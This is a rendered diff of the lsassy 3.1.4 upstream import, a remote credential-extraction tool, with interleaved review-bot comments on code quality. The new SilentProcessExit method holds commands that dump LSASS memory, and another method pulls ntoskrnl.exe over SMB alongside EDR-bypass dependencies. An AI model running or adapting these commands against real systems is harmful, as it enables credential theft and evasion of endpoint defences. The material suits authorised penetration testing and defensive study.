Import upstream version 3.1.4
Kali Janitor
1 year, 6 months ago
0 | 0 | # lsassy |
1 | 1 | |
2 | [![PyPI version](https://d25lcipzij17d.cloudfront.net/badge.svg?id=py&type=6&v=3.1.3&x2=0)](https://pypi.org/project/lsassy/) | |
2 | [![PyPI version](https://d25lcipzij17d.cloudfront.net/badge.svg?id=py&type=6&v=3.1.4&x2=0)](https://pypi.org/project/lsassy/) | |
3 | 3 | [![PyPI Statistics](https://img.shields.io/pypi/dm/lsassy.svg)](https://pypistats.org/packages/lsassy) |
4 | 4 | [![Tests](https://github.com/hackndo/lsassy/workflows/Tests/badge.svg)](https://github.com/hackndo/lsassy/actions?workflow=Tests) |
5 | 5 | [![Twitter](https://img.shields.io/twitter/follow/hackanddo?label=HackAndDo&style=social)](https://twitter.com/intent/follow?screen_name=hackanddo) |
482 | 482 | * [s4ntiago_p](https://twitter.com/s4ntiago_p) for [nanodump](https://github.com/helpsystems/nanodump) |
483 | 483 | * [0gtweet](https://twitter.com/0gtweet) for [Rdrleakdiag technique](https://twitter.com/0gtweet/status/1299071304805560321) |
484 | 484 | * [Luis Rocha](https://twitter.com/countuponsec) for [SQLDumper technique](https://twitter.com/countuponsec/status/910969424215232518) |
485 | * [Asaf Gilboa](https://mobile.twitter.com/asaf_gilboa) for [LsassSilentProcessExit technique](https://github.com/deepinstinct/LsassSilentProcessExit) | |
485 | 486 | |
486 | 487 | ## Official Discord Channel |
487 | 488 |
29 | 29 | help='Dump module options (Example procdump_path=/opt/procdump.exe,procdump=procdump.exe') |
30 | 30 | group_dump.add_argument('--timeout', action='store', type=int, default=5, |
31 | 31 | help='Max time to wait for lsass dump (Default 5s)') |
32 | group_dump.add_argument('--time-between-commands', action='store', type=int, default=7, | |
33 | help='Time to wait between dump methods commands (Default 7s)') | |
32 | group_dump.add_argument('--time-between-commands', action='store', type=int, default=1, | |
33 | help='Time to wait between dump methods commands (Default 1s)') | |
34 | 34 | group_dump.add_argument('--parse-only', action='store_true', help='Parse dump without dumping') |
35 | 35 | group_dump.add_argument('--keep-dump', action='store_true', help='Parse dump without dumping') |
36 | 36 |
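Review bot: The new default of 1 for `--time-between-commands` doubles as a sentinel in the dump-method `__init__` further down this commit (`if self._time_between_commands == 1: self._time_between_commands = 7`), so a user who explicitly passes `--time-between-commands 1` is silently bumped to 7 for that method. Keep the CLI default as "unset" and let each method fill in its own value: `group_dump.add_argument('--time-between-commands', action='store', type=int, default=None, help='Time to wait between dump methods commands (Default 1s, 7s for methods that need it)')`, then in the method `if self._time_between_commands is None: self._time_between_commands = 7` (with the base class, not visible here, falling back to 1). The unchanged `--keep-dump` line below still carries the `--parse-only` help text, 'Parse dump without dumping'; presumably it should describe keeping the dump file after parsing. The enclosing argument-parser function starts and ends outside this section.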
11 | 11 | |
12 | 12 | def __init__(self, session, timeout, time_between_commands): |
13 | 13 | super().__init__(session, timeout, time_between_commands) |
14 | ||
15 | # If default, set to 7. Otherwise, keep custom time | |
16 | if self._time_between_commands == 1: | |
17 | self._time_between_commands = 7 | |
18 | ||
14 | 19 | self.comsvcs_copied = False |
15 | 20 | self.comsvcs_copy_name = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(8)) + ".dll" |
16 | 21 | self.comsvcs_copy_path = "\\Windows\\Temp\\" |
20 | 20 | self.tmp_ntoskrnl = "lsassy_" + ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(32)) + ".exe" |
21 | 21 | |
22 | 22 | def prepare(self, options): |
23 | with open('/tmp/{}'.format(self.tmp_ntoskrnl), 'wb') as p: | |
23 | if os.name == 'nt': | |
24 | tmp_dir = 'C:\\Windows\\Temp\\' | |
25 | else: | |
26 | tmp_dir = '/tmp/' | |
27 | with open('{}{}'.format(tmp_dir, self.tmp_ntoskrnl), 'wb') as p: | |
24 | 28 | try: |
25 | 29 | self._session.smb_session.getFile("C$", "\\Windows\\System32\\ntoskrnl.exe", p.write) |
26 | logging.success("ntoskrnl.exe downloaded to /tmp/{}".format(self.tmp_ntoskrnl)) | |
30 | logging.success("ntoskrnl.exe downloaded to {}{}".format(tmp_dir, self.tmp_ntoskrnl)) | |
27 | 31 | except Exception as e: |
28 | 32 | logging.error("ntoskrnl.exe download error", exc_info=True) |
33 | try: | |
34 | os.remove('{}{}'.format(tmp_dir, self.tmp_ntoskrnl)) | |
35 | except Exception as e: | |
36 | return None | |
29 | 37 | return None |
30 | self.ntoskrnl.content = self.get_offsets("/tmp/{}".format(self.tmp_ntoskrnl)) | |
38 | self.ntoskrnl.content = self.get_offsets("{}{}".format(tmp_dir, self.tmp_ntoskrnl)) | |
31 | 39 | |
32 | 40 | if self.ntoskrnl.content is not None: |
33 | 41 | logging.success("ntoskrnl offsets extracted") |
34 | 42 | logging.debug(self.ntoskrnl.content.split("\n")[1]) |
35 | os.remove('/tmp/{}'.format(self.tmp_ntoskrnl)) | |
43 | os.remove('{}{}'.format(tmp_dir, self.tmp_ntoskrnl)) | |
36 | 44 | |
37 | 45 | return self.prepare_dependencies(options, [self.edrsandblast, self.RTCore64, self.ntoskrnl]) |
38 | 46 |
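Review bot: The new `os.name` branch in `prepare` replaces one hard-coded temp path with two; `tempfile.gettempdir()` already resolves the platform temp directory and honours TMPDIR/TEMP, so the four added lines collapse to `tmp_dir = os.path.join(tempfile.gettempdir(), '')` (trailing separator kept so the existing `'{}{}'.format(tmp_dir, ...)` call sites stay as they are), with `import tempfile` added at the top of the module if it is not already there. The added clean-up block at lines 33–36 binds `e` without using it and returns from inside the handler, which is the same `return None` that follows anyway; narrowing it to `except OSError: logging.debug("could not remove temporary ntoskrnl copy", exc_info=True)` keeps the best-effort removal while not hiding why it failed. The indentation of the `os.remove` at line 43 is not recoverable from this rendering; if it sits inside the `if self.ntoskrnl.content is not None:` block, the local copy is left behind whenever `get_offsets` returns None, so it should be at the same level as the `if`. `prepare` ends at the `return self.prepare_dependencies(...)` line; the class header and `__init__` are outside this section.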
0 | from lsassy.dumpmethod import IDumpMethod, Dependency | |
1 | ||
2 | ||
3 | class DumpMethod(IDumpMethod): | |
4 | #need_debug_privilege = True | |
5 | ||
6 | ||
7 | def __init__(self, session, timeout, time_between_commands): | |
8 | super().__init__(session, timeout, time_between_commands) | |
9 | self.silentprocessexit = Dependency("silentprocessexit", "silentprocessexit.exe") | |
10 | ||
11 | def prepare(self, options): | |
12 | return self.prepare_dependencies(options, [self.silentprocessexit]) | |
13 | ||
14 | def clean(self): | |
15 | self.clean_dependencies([self.silentprocessexit]) | |
16 | ||
17 | def get_commands(self, dump_path=None, dump_name=None, no_powershell=False): | |
18 | cmd_command = [ | |
19 | """for /f "tokens=2 delims= " %J in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do {} %J 0""".format( | |
20 | self.silentprocessexit.get_remote_path() | |
21 | ), | |
22 | """move C:\\temp\\lsass.exe-(PID-* C:\\Temp\\lsass && move C:\\Temp\\lsass\\lsass.exe*.dmp {}{} """.format(self.dump_path, self.dump_name), | |
23 | """del /s /q "C:\\temp\\lsass" && rmdir C:\\Temp\\lsass""" | |
24 | ] | |
25 | pwsh_command = [ | |
26 | "{} (Get-Process lsass).Id 0".format( | |
27 | self.silentprocessexit.get_remote_path() | |
28 | ), | |
29 | """move C:\\temp\\lsass.exe-(PID-* C:\\Temp\\lsass && move C:\\Temp\\lsass\\lsass.exe*.dmp {}{} """.format(self.dump_path, self.dump_name), | |
30 | """del /s /q "C:\\temp\\lsass" && rmdir C:\\Temp\\lsass""" ] | |
31 | return { | |
32 | "cmd": cmd_command, | |
33 | "pwsh": pwsh_command | |
34 | } |
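Review bot: `get_commands` in the new `silentprocessexit` module accepts `dump_path`, `dump_name` and `no_powershell` but never reads them, using `self.dump_path`/`self.dump_name` instead; if the base `IDumpMethod` (not visible here) sets those attributes before calling, the parameters are dead and should be documented as such, otherwise the arguments should be used. The second and third entries of `cmd_command` and `pwsh_command` are byte-identical, so extracting them once (`collect_commands = [...]`) and building each list as `[launcher] + collect_commands` removes the duplication and keeps the two variants from drifting. `#need_debug_privilege = True` is commented-out code with no explanation; either delete it or turn it into a comment saying why the privilege is not required for this method. The class has no docstring; a one-liner such as `"""Dump method using the LsassSilentProcessExit technique (see README credits)."""` would help, and the mixed `C:\\temp` / `C:\\Temp` spelling and the trailing space in the `move ... {}{} ` format string are worth normalising while here.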
58 | 58 | """ |
59 | 59 | StreamHandler and formatter added to root logger |
60 | 60 | """ |
61 | if (logging.getLogger().hasHandlers()): | |
62 | logging.getLogger().handlers.clear() | |
63 | ||
61 | 64 | handler = logging.StreamHandler(sys.stdout) |
62 | 65 | handler.setFormatter(LsassyFormatter(no_color)) |
63 | 66 | logging.getLogger().addHandler(handler) |
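Review bot: `logging.getLogger().handlers.clear()` at the new lines 61–62 drops every handler on the root logger, including any installed by a program that embeds lsassy as a library, and it mutates the handler list directly rather than going through `removeHandler`, which takes the logging lock. Prefer `root = logging.getLogger()` / `for existing in list(root.handlers): root.removeHandler(existing)`, or better, remember the handler this function adds and remove only that one on re-initialisation. The redundant parentheses in `if (logging.getLogger().hasHandlers()):` should go, and the docstring should say that existing root handlers are replaced, e.g. `Replace all root logger handlers with a single StreamHandler on stdout using LsassyFormatter.` The enclosing function starts above this section.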
0 | 0 | [tool.poetry] |
1 | 1 | name = "lsassy" |
2 | version = "3.1.3" | |
2 | version = "3.1.4" | |
3 | 3 | description = "Tool to remotely extract credentials" |
4 | 4 | readme = "README.md" |
5 | 5 | homepage = "https://github.com/hackndo/lsassy" |